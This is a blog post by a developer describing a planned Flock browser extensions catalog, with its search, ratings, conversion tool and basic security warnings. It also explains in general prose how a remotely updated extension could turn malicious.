Six months or so ago, I wrote the current version of Flock’s extensions site. It’s pretty simple and was intended to be simple. It wound up being even simpler than originally planned and has plenty of functionality hidden because we haven’t had a need for it or the ability to support it. We’ve thought a lot about various approaches to making extensions available, and I blogged some of those thoughts a few months ago. The quick summary is that we were waffling over whether to enforce quality for Flock extensions by officially hosting only a few or whether to have a free-for-all, or whether to blend the approaches. We ultimately decided on a blended approach, and we planned to launch a new extensions site in early February with the launch of the 0.5 release of Flock. For various reasons, that didn’t pan out.

I visited Flock HQ last week, and we revisited the subject. The result? I’ve burned some midnight oil over the last few days and have built a draft of Flock’s new extensions site. It’s a Drupal module that I anticipate ultimately making public in the event that any community sites or similar projects wish to host extensions. Here’s what you can expect to see when it launches in (unless history’s a good indicator) a couple of weeks.

  • Search by (at least) keyword, locale, platform, and category.
  • See what Flock staffers recommend
  • Find extensions that get high ratings from the community, which presupposes…
  • One-click extensions ratings
  • Comment on extensions
  • Convert extensions that don’t already work in Flock

This last one was a fun little piece of code to write, and I want to talk about it for a minute because I’m frankly a little proud of the way it solves a few problems both on the community side and the administration side.

Converting extensions is nothing new. I wrote a command-line utility six months ago that was handy for batch-converting extensions, though not especially suitable for broad public use. I also started work on a web converter, but I never got a chance to finish it. Luckily, the community stood up and filled the need by writing various server and desktop programs to help individuals make extensions work in Flock and discover what extensions had already been converted. Further, for the would-have-been February launch of a new Flock web site (complete with extensions site), John Vandenberg did a lot of work and provided lots of valuable input for an extensions module in particular and on extensions conversion and management generally. So my building a module to convert extensions isn’t exactly trail-blazing. The module nevertheless solves several problems in a way that blends some of these approaches and that I think will add lots of value both for Flock users and for our staff.

So, how does it work? Say you’ve done a quick search for an extension and can’t find it on our site. You’ll be prompted to go to the extension conversion page, where you can either upload or paste the url for the extension you’re looking for. The site then fetches the extension and reads in its meta-data. If it’s already in our database, the site updates a few fields. For example, it looks for locales and platforms the extension reports itself to be compatible with. So let’s say that someone else has previously uploaded the extension, but the version you upload supports more locales. Your action will update our record for the extension, making our meta-information that much more accurate. We also try to automatically figure out from the extension configuration who the author of the extension is, and, where possible, we provide “also by” information to help people find other extensions we’ve catalogued by a given author. It’s not perfect yet, but we’re heading in the right direction. And finally (among the goodies that give me a little thrill), we do some very basic security checks and provide a warning for extensions that do things that could potentially be dangerous. This merits some elaboration.

Over a year ago, I blogged about a major but necessary flaw in the Firefox extensions framework that makes is possible for extensions authors to write extensions that appear to be nice but that can morph over time into malicious extensions. All it takes is writing an extension that makes an XMLHttpRequest call to a remote server and evaluates the javascript string returned. Say I write an extension with broad appeal, and it makes such a call, and during the first week of deployment, the javascript returned by the server does useful and expected and non-malicious things. But after a week of gathering users, say I change the javascript returned by the server so that it reads your cookies and sends them to me or performs some other potentially nasty tasks. This is entirely possible, and it’s long fueled wariness on my part about installing extensions. The browser tells you only to install trusted extensions, but how many of us have even noticed that warning, much less paid it very much attention?

I don’t know of a way to address this issue fully, short of disabling extensions capability, which obviously won’t do. In order to help raise the security bar a little bit (not much, but every little bit helps), the new extensions catalog does a few rudimentary security checks. It looks for some potentially exploitable strings in extensions and produces a warning if they exist. In most cases, these will probably be false positives. For example, it’s perfectly valid and necessary for a del.icio.us extension to make XMLHttpRequest calls so that it can send and retrieve data to and from your del.icio.us account. Pretty much any extension that contacts a web service (read: every social networking extension) will cause the security flags to be raised. And it’s distinctly possible that users of our catalog will begin to ignore these warnings as readily as they ignore the browser’s warning about installing extensions. Every little flag or barrier to installing potentially malicious extensions helps, though, I think.

So, there’s a preview of what should be coming soon at a revamped Flock site. We’ll recommend a few extensions, and others will be pretty easily browsable. As we begin to accumulate ratings and comments, we’ll try to expose better and better ways of finding the best extensions. The catalog we’ll be releasing will in some ways be a very rough draft with its various hiccups and sputters, but it should be an improvement on what’s out there now, and it will empower the community to port most extensions to work with Flock even if we don’t publish all ported extensions. The process will also be streamlined for Flock staffers, and I think we’re heading down a good path for all of us. Stay tuned.


technorati tags: , ,


Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s